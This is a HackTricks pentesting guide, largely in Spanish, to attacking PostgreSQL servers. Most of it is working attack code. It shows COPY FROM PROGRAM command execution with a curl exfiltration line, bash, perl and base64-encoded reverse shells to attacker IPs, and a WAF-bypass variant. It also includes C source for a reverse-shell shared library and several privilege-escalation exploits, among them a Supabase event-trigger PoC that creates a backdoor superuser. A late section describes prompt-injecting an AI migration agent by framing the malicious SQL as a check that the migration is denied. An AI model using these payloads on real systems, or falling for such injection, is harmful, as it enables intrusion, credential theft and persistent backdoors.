5432,5433 - Pentesting Postgresql
Tip
Aprende y practica Hacking en AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP:HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Hacking en Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Información básica
PostgreSQL se describe como un sistema de base de datos objeto-relacional que es open source. Este sistema no solo utiliza el lenguaje SQL sino que también lo complementa con características adicionales. Sus capacidades le permiten manejar una amplia variedad de tipos de datos y operaciones, lo que lo convierte en una opción versátil para desarrolladores y organizaciones.
Puerto por defecto: 5432, y si este puerto ya está en uso parece que postgresql usará el siguiente puerto (probablemente 5433) que no esté en uso.
PORT STATE SERVICE
5432/tcp open pgsql
Conexión y enumeración básica
psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles
# Get current user
SELECT user;
# Get current database
SELECT current_catalog;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+
#List databases
SELECT datname FROM pg_database;
#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;
# Get languages
SELECT lanname,lanacl FROM pg_language;
# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;
# Get history of commands executed
\s
Warning
Si al ejecutar
\listencuentras una base de datos llamadardsadmin, sabes que estás dentro de una AWS postgresql database.
Para más información sobre cómo abusar de una base de datos PostgreSQL consulta:
Enumeración automática
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
Brute force
Port scanning
Según this research, cuando un intento de conexión falla, dblink lanza una excepción sqlclient_unable_to_establish_sqlconnection que incluye una explicación del error. A continuación se muestran ejemplos de estos detalles.
SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
- Host está caído
DETAIL: could not connect to server: No route to host Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
- Port está cerrado
DETAIL: could not connect to server: Connection refused Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
- Port está abierto
DETAIL: server closed the connection unexpectedly This probably means
the server terminated abnormally before or while processing the request
o
DETAIL: FATAL: password authentication failed for user "name"
- Port está abierto o filtrado
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
En funciones PL/pgSQL, actualmente no es posible obtener detalles de excepciones. Sin embargo, si tienes acceso directo al servidor PostgreSQL, puedes recuperar la información necesaria. Si extraer nombres de usuario y contraseñas de las tablas del sistema no es factible, puedes considerar utilizar el método de ataque por wordlist discutido en la sección anterior, ya que podría dar resultados positivos.
Enumeración de privilegios
Roles
| Tipos de roles | |
|---|---|
| rolsuper | El rol tiene privilegios de superusuario |
| rolinherit | El rol hereda automáticamente los privilegios de los roles de los que es miembro |
| rolcreaterole | El rol puede crear más roles |
| rolcreatedb | El rol puede crear bases de datos |
| rolcanlogin | El rol puede iniciar sesión. Es decir, este rol puede usarse como el identificador de autorización inicial de la sesión |
| rolreplication | El rol es un rol de replicación. Un rol de replicación puede iniciar conexiones de replicación y crear y eliminar slots de replicación. |
| rolconnlimit | Para roles que pueden iniciar sesión, esto establece el número máximo de conexiones concurrentes que puede realizar este rol. -1 significa sin límite. |
| rolpassword | No es la contraseña (siempre aparece como ********) |
| rolvaliduntil | Fecha de expiración de la contraseña (solo se usa para la autenticación por contraseña); null si no hay expiración |
| rolbypassrls | El rol omite todas las políticas de seguridad a nivel de fila; ver Section 5.8 para más información. |
| rolconfig | Valores predeterminados específicos del rol para variables de configuración en tiempo de ejecución |
| oid | ID del rol |
Grupos interesantes
- Si eres miembro de
pg_execute_server_programpuedes ejecutar programas - Si eres miembro de
pg_read_server_filespuedes leer archivos - Si eres miembro de
pg_write_server_filespuedes escribir archivos
Tip
Ten en cuenta que en Postgres un usuario, un grupo y un rol son lo mismo. Todo depende de cómo lo uses y si le permites iniciar sesión.
# Get users roles
\du
#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');
# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.
# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.
Tablas
# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';
# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;
#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';
Funciones
# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access
# Get all functions of a schema
\df pg_catalog.*
# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;
# Another aparent option
SELECT * FROM pg_proc;
Acciones del sistema de archivos
Leer directorios y archivos
Desde este commit los miembros del grupo definido DEFAULT_ROLE_READ_SERVER_FILES (llamado pg_read_server_files) y super users pueden usar el método COPY en cualquier ruta (revisa convert_and_check_filename en genfile.c):
# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;
Warning
Recuerda que si no eres superusuario pero tienes el permiso CREATEROLE puedes hacerte miembro de ese grupo:
GRANT pg_read_server_files TO username;There are other postgres functions that can be used to read file or list a directory. Only superusers and users with explicit permissions can use them:
# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission
select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');
# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file
# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation
Puedes encontrar más funciones en https://www.postgresql.org/docs/current/functions-admin.html
Escritura simple de archivos
Solo super users y los miembros de pg_write_server_files pueden usar copy para escribir archivos.
copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
Warning
Recuerda que si no eres super user pero tienes el permiso
CREATEROLEpuedes hacerte miembro de ese grupo:GRANT pg_write_server_files TO username;
Recuerda que COPY no puede manejar caracteres de nueva línea; por lo tanto, incluso si estás usando una carga útil en base64, necesitas enviar una sola línea.
Una limitación muy importante de esta técnica es que copy no puede usarse para escribir archivos binarios ya que modifica algunos valores binarios.
Binary files upload
Sin embargo, existen otras técnicas para subir archivos binarios grandes:
Big Binary Files Upload (PostgreSQL)
Actualizar datos de tablas de PostgreSQL mediante escritura local de archivos
Si tienes los permisos necesarios para leer y escribir archivos del servidor PostgreSQL, puedes actualizar cualquier tabla del servidor sobrescribiendo el nodo de archivo asociado en el directorio de datos de PostgreSQL. Más sobre esta técnica aquí.
Pasos requeridos:
- Obtener el directorio de datos de PostgreSQL
SELECT setting FROM pg_settings WHERE name = 'data_directory';
Nota: Si no puedes obtener la ruta del directorio de datos actual desde pg_settings, puedes consultar la versión mayor de PostgreSQL mediante la consulta SELECT version() e intentar forzar (brute-force) la ruta. Las rutas comunes del directorio de datos en instalaciones Unix de PostgreSQL son /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/. Un nombre de cluster común es main.
- Obtener la ruta relativa al filenode asociado con la tabla objetivo
SELECT pg_relation_filepath('{TABLE_NAME}')
Esta consulta debería devolver algo como base/3/1337. La ruta completa en disco será $DATA_DIRECTORY/base/3/1337, es decir /var/lib/postgresql/13/main/base/3/1337.
- Descargar el filenode usando las funciones
lo_*
SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
- Obtener el tipo de datos asociado con la tabla objetivo
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
- Usa el PostgreSQL Filenode Editor para editar el filenode; establece todos los flags booleanos
rol*a 1 para permisos completos.
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}

- Volver a subir el filenode editado mediante las funciones
lo_*, y sobrescribir el archivo original en el disco
SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
- (Opcional) Limpiar la caché en memoria de la tabla ejecutando una consulta SQL costosa
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
- Ahora deberías ver los valores actualizados de la tabla en PostgreSQL.
También puedes convertirte en superadmin editando la tabla pg_authid. See the following section.
RCE
RCE to program
Since version 9.3, only super users and member of the group pg_execute_server_program can use copy for RCE (example with exfiltration:
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
Ejemplo para ejecutar:
#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
Warning
Recuerda que si no eres superusuario pero tienes el permiso
CREATEROLEpuedes hacerte miembro de ese grupo:GRANT pg_execute_server_program TO username;
O usa el módulo multi/postgres/postgres_copy_from_program_cmd_exec de metasploit.
Más información sobre esta vulnerabilidad here. Aunque fue reportado como CVE-2019-9193, Postges declaró que se trataba de feature and will not be fixed.
Eludir filtros de palabras clave/WAF para alcanzar COPY PROGRAM
En contextos de SQLi con consultas apiladas, un WAF puede eliminar o bloquear la palabra clave literal COPY. Puedes construir dinámicamente la sentencia y ejecutarla dentro de un bloque PL/pgSQL DO. Por ejemplo, crea la C inicial con CHR(67) para eludir filtros ingenuos y EXECUTE el comando ensamblado:
DO $$
DECLARE cmd text;
BEGIN
cmd := CHR(67) || 'OPY (SELECT '''') TO PROGRAM ''bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"''';
EXECUTE cmd;
END $$;
This pattern avoids static keyword filtering and still achieves OS command execution via COPY ... PROGRAM. It is especially useful when the application echoes SQL errors and allows stacked queries.
RCE con los lenguajes de PostgreSQL
RCE con extensiones de PostgreSQL
Once you have learned from the previous post how to upload binary files you could try obtain RCE uploading a postgresql extension and loading it.
RCE with PostgreSQL Extensions
RCE del archivo de configuración de PostgreSQL
Tip
Los siguientes vectores de RCE son especialmente útiles en contextos SQLi restringidos, ya que todos los pasos pueden realizarse mediante sentencias SELECT anidadas
El archivo de configuración de PostgreSQL es escribible por el postgres user, que es el que ejecuta la base de datos, así que como superuser, puedes escribir archivos en el sistema de ficheros, y por lo tanto puedes sobrescribir este archivo.
.png)
RCE con ssl_passphrase_command
More information about this technique here.
El archivo de configuración tiene algunos atributos interesantes que pueden llevar a RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'Ruta a la clave privada de la base de datosssl_passphrase_command = ''Si el archivo privado está protegido por contraseña (encrypted) postgresql ejecutará el comando indicado en este atributo.ssl_passphrase_command_supports_reload = offIf este atributo está on el comando ejecutado si la clave está protegida por contraseña se ejecutará cuandopg_reload_conf()sea ejecutado.
Entonces, un atacante necesitará:
- Volcar la clave privada desde el servidor
- Cifrar la clave privada descargada:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key- Sobrescribir
- Volcar la configuración actual de postgresql
- Sobrescribir la configuración con la configuración mencionada:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'ssl_passphrase_command_supports_reload = on- Ejecutar
pg_reload_conf()
Mientras probaba esto observé que esto solo funcionará si el archivo de clave privada tiene permisos 640, está propiedad de root y del grupo ssl-cert o postgres (para que el postgres user pueda leerla), y está ubicado en /var/lib/postgresql/12/main.
RCE con archive_command
More información sobre esta configuración y sobre WAL aquí.
Otro atributo en el archivo de configuración que es explotable es archive_command.
Para que esto funcione, la opción archive_mode debe ser 'on' o 'always'. Si eso es cierto, entonces podríamos sobrescribir el comando en archive_command y forzar su ejecución a través de las operaciones WAL (write-ahead logging).
Los pasos generales son:
- Comprobar si archive mode está habilitado:
SELECT current_setting('archive_mode') - Sobrescribir
archive_commandcon el payload. Por ejemplo, un reverse shell:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl' - Recargar la configuración:
SELECT pg_reload_conf() - Forzar la ejecución de la operación WAL, que llamará al archive command:
SELECT pg_switch_wal()oSELECT pg_switch_xlog()para algunas versiones de Postgres
Edición de postgresql.conf mediante Large Objects (compatible con SQLi)
Cuando se necesitan escrituras multilínea (p. ej., para establecer múltiples GUCs), usa PostgreSQL Large Objects para leer y sobrescribir completamente la configuración desde SQL. Este enfoque es ideal en contextos SQLi donde COPY no puede manejar saltos de línea o escrituras seguras para binarios.
Example (adjust the major version and path if needed, e.g. version 15 on Debian):
-- 1) Import the current configuration and note the returned OID (example OID: 114575)
SELECT lo_import('/etc/postgresql/15/main/postgresql.conf');
-- 2) Read it back as text to verify
SELECT encode(lo_get(114575), 'escape');
-- 3) Prepare a minimal config snippet locally that forces execution via WAL
-- and base64-encode its contents, for example:
-- archive_mode = 'always'\n
-- archive_command = 'bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"'\n
-- archive_timeout = 1\n
-- Then write the new contents into a new Large Object and export it over the original file
SELECT lo_from_bytea(223, decode('<BASE64_POSTGRESQL_CONF>', 'base64'));
SELECT lo_export(223, '/etc/postgresql/15/main/postgresql.conf');
-- 4) Reload the configuration and optionally trigger a WAL switch
SELECT pg_reload_conf();
-- Optional explicit trigger if needed
SELECT pg_switch_wal(); -- or pg_switch_xlog() on older versions
Esto produce ejecución fiable de comandos del SO mediante archive_command como el usuario postgres, siempre que archive_mode esté habilitado. En la práctica, establecer un archive_timeout bajo puede provocar invocaciones rápidas sin requerir un cambio explícito de WAL.
RCE with preload libraries
More information about this technique here.
Este vector de ataque aprovecha las siguientes variables de configuración:
session_preload_libraries– bibliotecas que serán cargadas por el servidor PostgreSQL en la conexión del cliente.dynamic_library_path– lista de directorios donde el servidor PostgreSQL buscará las bibliotecas.
Podemos establecer el valor de dynamic_library_path a un directorio escribible por el usuario postgres que ejecuta la base de datos, p. ej., el directorio /tmp/, y subir allí un objeto .so malicioso. A continuación, forzaremos al servidor PostgreSQL a cargar nuestra biblioteca recién subida incluyéndola en la variable session_preload_libraries.
The attack steps are:
- Download the original
postgresql.conf - Include the
/tmp/directory in thedynamic_library_pathvalue, e.g.dynamic_library_path = '/tmp:$libdir' - Include the malicious library name in the
session_preload_librariesvalue, e.g.session_preload_libraries = 'payload.so' - Check major PostgreSQL version via the
SELECT version()query - Compile the malicious library code with the correct PostgreSQL dev package Sample code:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
void _init() {
/*
code taken from https://www.revshells.com/
*/
int port = REVSHELL_PORT;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}
Compiling the code:
gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
- Upload the malicious
postgresql.conf, created in steps 2-3, and overwrite the original one - Upload the
payload.sofrom step 5 to the/tmpdirectory - Reload the server configuration by restarting the server or invoking the
SELECT pg_reload_conf()query - At the next DB connection, you will receive the reverse shell connection.
Postgres Privesc
CREATEROLE Privesc
Grant
According to the docs: Roles having CREATEROLE privilege can grant or revoke membership in any role that is not a superuser.
Entonces, si tienes el permiso CREATEROLE podrías concederte acceso a otros roles (que no sean superuser) que pueden darte la opción de leer y escribir archivos y ejecutar comandos:
# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;
Modificar contraseña
Los usuarios con este rol también pueden cambiar las contraseñas de otros non-superusers:
#Change password
ALTER USER user_name WITH PASSWORD 'new_password';
Privesc to SUPERUSER
Es bastante común encontrar que los usuarios locales pueden iniciar sesión en PostgreSQL sin proporcionar ninguna contraseña. Por lo tanto, una vez que hayas obtenido permisos para ejecutar código puedes abusar de estos permisos para concederte el rol SUPERUSER:
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
Tip
Esto suele ser posible debido a las siguientes líneas en el archivo
pg_hba.conf:# "local" is for Unix domain socket connections only local all all trust # IPv4 local connections: host all all 127.0.0.1/32 trust # IPv6 local connections: host all all ::1/128 trust
ALTER TABLE privesc
In this writeup se explica cómo fue posible un privesc en Postgres GCP abusando del privilegio ALTER TABLE que se otorgó al usuario.
Cuando intentas hacer a otro usuario propietario de una tabla deberías obtener un error que lo impida, pero aparentemente GCP dio esa opción al usuario postgres que no es superuser en GCP:
.png)
Uniendo esta idea con el hecho de que cuando los comandos INSERT/UPDATE/ANALYZE se ejecutan sobre una tabla con una función de índice, la función es llamada como parte del comando con los permisos del propietario de la tabla. Es posible crear un índice con una función y dar permisos de propietario a un superusuario sobre esa tabla, y luego ejecutar ANALYZE sobre la tabla con la función maliciosa que podrá ejecutar comandos porque está usando los privilegios del propietario.
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);
Exploitation
- Cree una nueva tabla.
- Inserte contenido irrelevante en la tabla para proporcionar datos a la función de índice.
- Desarrolle una función de índice maliciosa que contenga una carga útil de ejecución de código, permitiendo la ejecución de comandos no autorizados.
- ALTER el propietario de la tabla a “cloudsqladmin”, que es el rol de superusuario de GCP utilizado exclusivamente por Cloud SQL para administrar y mantener la base de datos.
- Realice una operación ANALYZE en la tabla. Esta acción obliga al motor de PostgreSQL a cambiar al contexto de usuario del propietario de la tabla, “cloudsqladmin”. En consecuencia, la función de índice maliciosa se invoca con los permisos de “cloudsqladmin”, permitiendo así la ejecución del comando de shell previamente no autorizado.
In PostgreSQL, this flow looks something like this:
CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);
INSERT INTO temp_table VALUES ('dummy content');
/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';
CREATE INDEX index_malicious ON public.temp_table (suid_function(data));
ALTER TABLE temp_table OWNER TO cloudsqladmin;
/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';
ANALYZE public.temp_table;
Entonces, la tabla shell_commands_results contendrá la salida del código ejecutado:
uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
Inicio de sesión local
Algunas instancias de postgresql mal configuradas podrían permitir el inicio de sesión de cualquier usuario local; es posible conectarse localmente desde 127.0.0.1 usando la función dblink:
\du * # Get Users
\l # Get databases
SELECT * FROM dblink('host=127.0.0.1
port=5432
user=someuser
password=supersecret
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
Warning
Ten en cuenta que para que la consulta anterior funcione la función
dblinkdebe existir. Si no existe, puedes intentar crearla conCREATE EXTENSION dblink;
Si tienes la contraseña de un usuario con más privilegios, pero el usuario no tiene permitido iniciar sesión desde una IP externa, puedes usar la siguiente función para ejecutar consultas como ese usuario:
SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
Es posible comprobar si esta función existe con:
SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
Función definida por el usuario con SECURITY DEFINER
In this writeup, pentesters pudieron escalar privilegios dentro de una instancia de postgres proporcionada por IBM, porque encontraron esta función con la bandera SECURITY DEFINER:
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
VOLATILE SECURITY DEFINER
PARALLEL UNSAFE
COST 100
AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
…
Como explained in the docs una función con SECURITY DEFINER se ejecuta con los privilegios del usuario que la posee. Por lo tanto, si la función es vulnerable a SQL Injection o está realizando acciones privilegiadas con parámetros controlados por el atacante, podría ser abusada para escalar privilegios dentro de postgres.
En la línea 4 del código anterior puedes ver que la función tiene la bandera SECURITY DEFINER.
CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
Y luego ejecutar comandos:
.png)
Fuerza bruta de contraseñas con PL/pgSQL
PL/pgSQL es un lenguaje de programación completo que ofrece un mayor control procedural en comparación con SQL. Permite el uso de loops y otras estructuras de control para mejorar la lógica del programa. Además, las SQL statements y los triggers pueden invocar funciones creadas con el lenguaje PL/pgSQL. Esta integración permite un enfoque más completo y versátil para la programación y automatización de bases de datos.
Puedes abusar de este lenguaje para pedir a PostgreSQL que realice fuerza bruta sobre las credenciales de los usuarios.
Privesc sobrescribiendo tablas internas de PostgreSQL
Tip
El siguiente vector de privesc es especialmente útil en contextos de SQLi restringidos, ya que todos los pasos pueden realizarse mediante sentencias SELECT anidadas
Si puedes leer y escribir archivos del servidor PostgreSQL, puedes convertirte en superuser sobrescribiendo el filenode en disco de PostgreSQL asociado con la tabla interna pg_authid.
Read more about esta técnica here.
The attack steps are:
- Obtener el directorio de datos de PostgreSQL
- Obtener una ruta relativa al filenode asociado con la tabla
pg_authid - Descargar el filenode mediante las funciones
lo_* - Obtener el tipo de dato asociado con la tabla
pg_authid - Usar el PostgreSQL Filenode Editor para editar el filenode; establecer todas las banderas booleanas
rol*a 1 para permisos completos. - Volver a subir el filenode editado mediante las funciones
lo_*y sobrescribir el archivo original en el disco - (Opcional) Limpiar la caché de tablas en memoria ejecutando una consulta SQL costosa
- Ahora deberías tener los privilegios de un superadmin completo.
Prompt-injecting en herramientas de migración gestionadas
AI-heavy SaaS frontends (e.g., Lovable’s Supabase agent) frequently expose LLM “tools” that run migrations as high-privileged service accounts. A practical workflow is:
- Enumerar quién está aplicando realmente las migraciones:
SELECT version, name, created_by, statements, created_at
FROM supabase_migrations.schema_migrations
ORDER BY version DESC LIMIT 20;
- Prompt-inject the agent into running attacker SQL via the privileged migration tool. Enmarcar las cargas útiles como “please verify this migration is denied” elude de forma consistente las protecciones básicas.
- Once arbitrary DDL runs in that context, crea inmediatamente tablas o extensiones controladas por el atacante que concedan persistencia a tu cuenta con pocos privilegios.
Tip
Consulte también la guía general AI agent abuse playbook para más técnicas de prompt-injection contra asistentes habilitados con herramientas.
Volcado de metadatos de pg_authid mediante migraciones
Las migraciones privilegiadas pueden colocar pg_catalog.pg_authid en una tabla legible por el atacante incluso si el acceso directo está bloqueado para tu rol normal.
Preparando metadatos de pg_authid con una migración privilegiada
```sql DROP TABLE IF EXISTS public.ai_models CASCADE; CREATE TABLE public.ai_models ( id SERIAL PRIMARY KEY, model_name TEXT, config JSONB, created_at TIMESTAMP DEFAULT NOW() ); GRANT ALL ON public.ai_models TO supabase_read_only_user; GRANT ALL ON public.ai_models TO supabase_admin; INSERT INTO public.ai_models (model_name, config) SELECT rolname, jsonb_build_object( 'password_hash', rolpassword, 'is_superuser', rolsuper, 'can_login', rolcanlogin, 'valid_until', rolvaliduntil ) FROM pg_catalog.pg_authid; ```Los usuarios con bajos privilegios ahora pueden leer public.ai_models para obtener hashes SCRAM y metadatos de roles para offline cracking o lateral movement.
Event-trigger privesc durante las instalaciones de la extensión postgres_fdw
Las implementaciones gestionadas de Supabase dependen de la extensión supautils para envolver CREATE EXTENSION con scripts propiedad del proveedor before-create.sql/after-create.sql ejecutados como verdaderos superusuarios. El script after-create de postgres_fdw emite brevemente ALTER ROLE postgres SUPERUSER, ejecuta ALTER FOREIGN DATA WRAPPER postgres_fdw OWNER TO postgres, y luego revierte a postgres a NOSUPERUSER. Dado que ALTER FOREIGN DATA WRAPPER dispara triggers de evento ddl_command_start/ddl_command_end mientras current_user es superuser, los triggers creados por tenants pueden ejecutar SQL de atacante dentro de esa ventana.
Exploit flow:
- Crear una función trigger de evento PL/pgSQL que compruebe
SELECT usesuper FROM pg_user WHERE usename = current_usery, cuando sea true, cree un rol backdoor (p. ej.,CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD 'temp123'). - Registrar la función en ambos
ddl_command_startyddl_command_end. DROP EXTENSION IF EXISTS postgres_fdw CASCADE;seguido deCREATE EXTENSION postgres_fdw;para volver a ejecutar el after-create hook de Supabase.- Cuando el hook eleva a
postgres, el trigger se ejecuta, crea el rol SUPERUSER persistente y se lo otorga de vuelta apostgrespara un fácil acceso conSET ROLE.
Event trigger PoC for the postgres_fdw after-create window
```sql CREATE OR REPLACE FUNCTION escalate_priv() RETURNS event_trigger AS $$ DECLARE is_super BOOLEAN; BEGIN SELECT usesuper INTO is_super FROM pg_user WHERE usename = current_user; IF is_super THEN BEGIN EXECUTE 'CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD ''temp123'''; EXCEPTION WHEN duplicate_object THEN NULL; END; BEGIN EXECUTE 'GRANT priv_esc TO postgres'; EXCEPTION WHEN OTHERS THEN NULL; END; END IF; END; $$ LANGUAGE plpgsql;DROP EVENT TRIGGER IF EXISTS log_start CASCADE; DROP EVENT TRIGGER IF EXISTS log_end CASCADE; CREATE EVENT TRIGGER log_start ON ddl_command_start EXECUTE FUNCTION escalate_priv(); CREATE EVENT TRIGGER log_end ON ddl_command_end EXECUTE FUNCTION escalate_priv();
DROP EXTENSION IF EXISTS postgres_fdw CASCADE; CREATE EXTENSION postgres_fdw;
</details>
